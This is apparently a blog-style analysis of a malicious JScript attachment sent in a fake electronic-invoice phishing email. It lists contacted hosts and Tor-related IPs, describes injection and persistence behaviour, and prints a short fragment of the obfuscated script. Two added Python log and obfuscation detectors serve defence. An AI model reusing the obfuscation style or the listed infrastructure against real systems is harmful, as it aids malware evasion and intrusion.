Today I had a nice surprise: I found in the Spam folder an email telling me an electronic invoice had just been sent to me.
I have to say that the surprises keep coming.
You will see!!!
Part 1 – The infected file & dropped files
Dear Madam / Madam,
We would like to inform you that you have an electronic invoice issued. The attachment is an official accounting document and complies with the requirements of the Electronic Document and Electronic Signature Act. If you have additional questions or need other information, please do not hesitate to contact us with the contact details on your electronic invoice.
Thank you for being a customer of ENERGO-PRO.
We wish you a successful day.
* This email can contain personalized information. If you are not the recipient for whom it is intended, please delete it. Thank you!
The attached file is named öá¬ÔŃÓá No 0258923817 (3)… yeeep, and it is a JScript file. I scanned it with VirusTotal.
The -1 vote is mine! (lol).
So 0 of 60 antivirus engines detect this virus. In the previous article I wrote about the problem of detection.
Security Advice – The Antivirus is just a security helper!
Running the öá¬ÔŃÓá No 0258923817 (3) script injects VBScript code and tries to connect out. All the connections made while running this script:
- withadvertisingthe.com
- myip.opendns.com
- noreply.org
- riseup.ne
- Faravahar Tor Authority Directory – 199.254.238.52
- Tor Exit Router – 178.16.208.59
- vps.net
- 91.219.237.154
- digitalocean.com
- voxility.net
GET /tor/status-vote/current/consensus from hosts:
86.59.21.38/154.35.175.225
There are BitBlinder Project files (see GitHub for more information). Remember this... I will give you some good info later!
Connected servers:
5.149.213.224/86.59.21.38/199.254.238.52/154.35.175.225/178.16.208.59/46.23.72.81/91.219.237.154/46.101.183.160/93.115.84.143/165.227.130.167
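The hosts and paths above are the kind of indicators a defender would turn into a log check. As an added example (my code, not part of the original post), the Python below runs those indicators over Squid-style proxy log lines and flags a client that fetches the Tor directory consensus, talks to one of the listed directory authorities or other contacted IPs, or looks up its external address via myip.opendns.com. The IP addresses and URL paths come from the lists above; the log format, the client addresses and the log lines themselves are constructed for the demonstration.

```python
import re
from collections import defaultdict

# Indicators taken from the analysis above. Everything marked "constructed"
# further down is demo data, not captured traffic.
TOR_DIR_AUTHORITY_IPS = {"199.254.238.52", "86.59.21.38", "154.35.175.225"}
CONTACTED_IPS = {
    "5.149.213.224", "86.59.21.38", "199.254.238.52", "154.35.175.225",
    "178.16.208.59", "46.23.72.81", "91.219.237.154", "46.101.183.160",
    "93.115.84.143", "165.227.130.167",
}
EXTERNAL_IP_LOOKUP_HOSTS = {"myip.opendns.com"}
# Tor directory paths seen in the sample: the consensus and a relay descriptor by fingerprint.
TOR_DIR_PATH = re.compile(r"^/tor/(status-vote/current/consensus|server/fp/[0-9a-f]{40})")

# Squid-style access.log: "<ts> <elapsed> <client> <status> <bytes> <method> <url> ..."
LOG_RE = re.compile(
    r"^(?P<ts>\S+)\s+\d+\s+(?P<client>\S+)\s+\S+\s+\d+\s+(?P<method>\S+)\s+(?P<url>\S+)"
)
URL_RE = re.compile(r"^https?://(?P<host>[^/:]+)(?::\d+)?(?P<path>/\S*)?")


def classify(url):
    """Return the reasons one URL matches the sample's network behaviour ([] if none)."""
    m = URL_RE.match(url)
    if not m:
        return []
    host, path = m.group("host"), m.group("path") or "/"
    reasons = []
    if TOR_DIR_PATH.match(path):
        reasons.append("tor-directory-fetch")
    if host in TOR_DIR_AUTHORITY_IPS:
        reasons.append("tor-directory-authority")
    elif host in CONTACTED_IPS:
        reasons.append("sample-contacted-ip")
    if host in EXTERNAL_IP_LOOKUP_HOSTS:
        reasons.append("external-ip-lookup")
    return reasons


def scan(lines):
    """Map each client to the sorted set of distinct reasons seen across its requests."""
    hits = defaultdict(set)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip malformed lines instead of crashing on a noisy log
        for reason in classify(m.group("url")):
            hits[m.group("client")].add(reason)
    return {client: sorted(reasons) for client, reasons in hits.items()}


def flagged_clients(lines, min_reasons=2):
    """Clients showing at least two distinct behaviours; a single hit is too noisy to page on."""
    return sorted(c for c, r in scan(lines).items() if len(r) >= min_reasons)


# Constructed sample log (not real traffic): 10.0.0.7 mimics the sample, 10.0.0.9 is benign.
SAMPLE_LOG = [
    "1517000001.123 45 10.0.0.7 TCP_MISS/200 512 GET http://myip.opendns.com/ - HIER_DIRECT/208.67.222.222 text/html",
    "1517000002.456 80 10.0.0.7 TCP_MISS/200 1048576 GET http://154.35.175.225/tor/status-vote/current/consensus - HIER_DIRECT/154.35.175.225 text/plain",
    "1517000003.789 30 10.0.0.7 TCP_MISS/200 2048 GET http://91.219.237.154/tor/server/fp/6a7479eb4378b946dc2a65a7f2c706b42bae2ebd - HIER_DIRECT/91.219.237.154 text/plain",
    "1517000004.000 20 10.0.0.9 TCP_MISS/200 8192 GET http://example.com/index.html - HIER_DIRECT/93.184.216.34 text/html",
    "garbage line that does not parse",
]

if __name__ == "__main__":
    for client, reasons in scan(SAMPLE_LOG).items():
        print(client, reasons)
    print("flagged:", flagged_clients(SAMPLE_LOG))
```

Requiring two distinct behaviours per client before flagging keeps a lone consensus download (a legitimate Tor Browser user, for instance) from paging anyone, while the combination of an external-IP lookup and directory fetches from one workstation is worth a look.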
What else to show you from this file…
Last write session:
It makes a lot of changes after running:
- Remote Access: tries to identify its external IP address
- Stealer/Phishing: scans for artifacts that may help identify the target
- Touched instant messenger related registry keys
- Persistence: injects into explorer
- Injects into remote processes
- Modifies auto-execute functionality by setting/creating a value in the registry
- Spawns a lot of processes
- Writes data to a remote process
Dropped files:
- adprtext.dll
- agreebowl.dll
Part 2 – The “öá¬ÔŃÓá No 0258923817 (3)” file code.
The 0/60 detection rate is due to the way the script was written. The author used an ingenious way to write the code so that its signature differs from that of known viruses. Here I will show you a part of the script's code:
ozen.decideWorry+sickCityAdditionDepth[15]+seriousPaidRegion.happened;}
function pigDutyUnusual(passForeignPush){return lowerCountryCharacter[5];}
function frontFurtherAfterMadeConstruction(wasMoodCleanRefusedPush){return slightForgotDiscussionHistoryGiant[3]+temperatureBeforeDo.audienceCircus+evidenceCompositionCrackPrincipalEar[2]+seriousPaidRegion.engineer+sickCityAdditionDepth[3]+sickCityAdditionDepth[4]+breatheCupParentEscape[13]+biggerShellsDeterminePorchCreature[7]+temperatureBeforeDo.twoWest+importanceArtAgain[7];}
function compareSpeciesGiantBuildingSeveral(excitedCanScoreCarefulFine){return roughWhenPlentyDistanceFrozen.decideWorry+townOrdinaryDarkFlowerLibrary.careful+importanceArtAgain[7]+temperatureBeforeDo.audienceCircus+wonProvideMostOrdinaryRoad.railroadOr+slightForgotDiscussionHistoryGiant[7]+importanceArtAgain[7]+evidenceCompositionCrackPrincipalEar[2]+breatheCupParentEscape[17];}
var clearlyPieceBillEarlierOrganization=[];
clearlyPieceBillEarlierOrganization[todayBehaviorStrengthQuietlyTypical('p-_sI1owb)jB:o6')](visitorBehindSpeak('9K0c0htw(o.kvr'));
var packageLargePig=[-314];
var tearsKitchenCatchNeck=[66];
var fifteenRunStraightSpeech=[];
var aidMirrorWeakProgressInclude=[7];
var sightDistanceDid=[1];
var taskAnywayHungry=[mightEmptyCarriedRapidlyOnce('26P:Y&kwgPLW0')];
function partRelatedBatBaby(metFreeSomeone){
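The word-salad identifiers and the piecewise string assembly in the fragment above are exactly what a static heuristic can key on when signatures fail. As an added example (my code, not the post's and not the malware author's), the Python below scores a JScript source on three features: the share of identifiers glued together from four or more dictionary words, return statements that rebuild a string from array slots and object properties, and computed-member calls of the form x[f('...')](...). The suspicious sample is an excerpt of the fragment shown above (with the line-wrapped string literal joined back together); the benign snippet, the weights and the threshold are my own assumptions, tuned to this one sample rather than validated against a corpus.

```python
import re

# Token-level heuristics for the obfuscation style seen in the sample above.
STRING_LIT = re.compile(r"'[^']*'|\"[^\"]*\"")
IDENT_RE = re.compile(r"\b[A-Za-z_][A-Za-z0-9_]*\b")
CAMEL_WORD = re.compile(r"[A-Z]?[a-z]+")
JS_KEYWORDS = {"function", "return", "var", "if", "else", "new", "this",
               "true", "false", "null", "for", "while", "typeof"}
# One "piece" of an assembled string: identifier[index] or identifier.property
PIECE = r"[A-Za-z_$][\w$]*(?:\[\d+\]|\.[A-Za-z_$][\w$]*)"
PIECEWISE_RETURN = re.compile(r"return\s+" + PIECE + r"(?:\s*\+\s*" + PIECE + r"){2,}\s*;")
# obj[decoder('...')](...): the method name is only known after decoding a string at run time
COMPUTED_CALL = re.compile(r"[\w$]+\[\s*[\w$]+\(\s*'[^']*'\s*\)\s*\]\s*\(")


def word_segments(ident):
    """Count camelCase word segments: 'sickCityAdditionDepth' -> 4."""
    return len(CAMEL_WORD.findall(ident))


def obfuscation_features(src):
    """Extract the three features from JScript source text."""
    code = STRING_LIT.sub("''", src)  # blank string contents so they are not counted as identifiers
    idents = {i for i in IDENT_RE.findall(code) if i not in JS_KEYWORDS}
    return {
        "identifiers": len(idents),
        "word_salad_identifiers": sum(1 for i in idents if word_segments(i) >= 4),
        "piecewise_string_returns": len(PIECEWISE_RETURN.findall(code)),
        "computed_member_calls": len(COMPUTED_CALL.findall(code)),
    }


def obfuscation_score(src):
    """Assumed weighting: word-salad share >= 30% gives 2 points, each pattern hit 1 (capped)."""
    f = obfuscation_features(src)
    ratio = f["word_salad_identifiers"] / f["identifiers"] if f["identifiers"] else 0.0
    score = 2 if ratio >= 0.3 else 0
    score += min(f["piecewise_string_returns"], 3)
    score += min(f["computed_member_calls"], 2)
    return score


def is_suspicious(src, threshold=3):
    """Assumed threshold; tune it against a corpus of clean scripts before relying on it."""
    return obfuscation_score(src) >= threshold


# Excerpt of the fragment quoted in the post (wrapped string literal joined back together).
SAMPLE_OBFUSCATED = """function pigDutyUnusual(passForeignPush){return lowerCountryCharacter[5];}
function frontFurtherAfterMadeConstruction(wasMoodCleanRefusedPush){return slightForgotDiscussionHistoryGiant[3]+temperatureBeforeDo.audienceCircus+evidenceCompositionCrackPrincipalEar[2]+seriousPaidRegion.engineer+sickCityAdditionDepth[3]+sickCityAdditionDepth[4]+breatheCupParentEscape[13]+biggerShellsDeterminePorchCreature[7]+temperatureBeforeDo.twoWest+importanceArtAgain[7];}
var clearlyPieceBillEarlierOrganization=[];
clearlyPieceBillEarlierOrganization[todayBehaviorStrengthQuietlyTypical('p-_sI1owb)jB:o6')](visitorBehindSpeak('9K0c0htw(o.kvr'));
var packageLargePig=[-314];
var taskAnywayHungry=[mightEmptyCarriedRapidlyOnce('26P:Y&kwgPLW0')];
"""

# Constructed benign snippet for contrast: ordinary names, a literal in the concatenation.
SAMPLE_BENIGN = """function getUserName(user){return user.firstName+" "+user.lastName;}
var count=0;
function increment(){count=count+1;return count;}
"""

if __name__ == "__main__":
    for label, src in (("obfuscated", SAMPLE_OBFUSCATED), ("benign", SAMPLE_BENIGN)):
        print(label, obfuscation_features(src), "score", obfuscation_score(src),
              "suspicious" if is_suspicious(src) else "clean")
```

The point of the word-segment feature is that ordinary code rarely needs four-word identifiers, while a generator that picks random dictionary words to defeat signatures produces them almost exclusively; combined with the array-slot string assembly, that is a shape a sandbox or mail gateway can score without ever executing the script.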
Part 3 – BitBlinder project
BitBlinder project – a way to create your own hidden services on the DarkWeb. Project-specific files:
- http://154.35.175.225/tor/status-vote/current/consensus.js
- http://91.219.237.154/tor/server/fp/6a7479eb4378b946dc2a65a7f2c706b42bae2ebd
0/60 … remember that!!!
Have fun & Stay safe!!!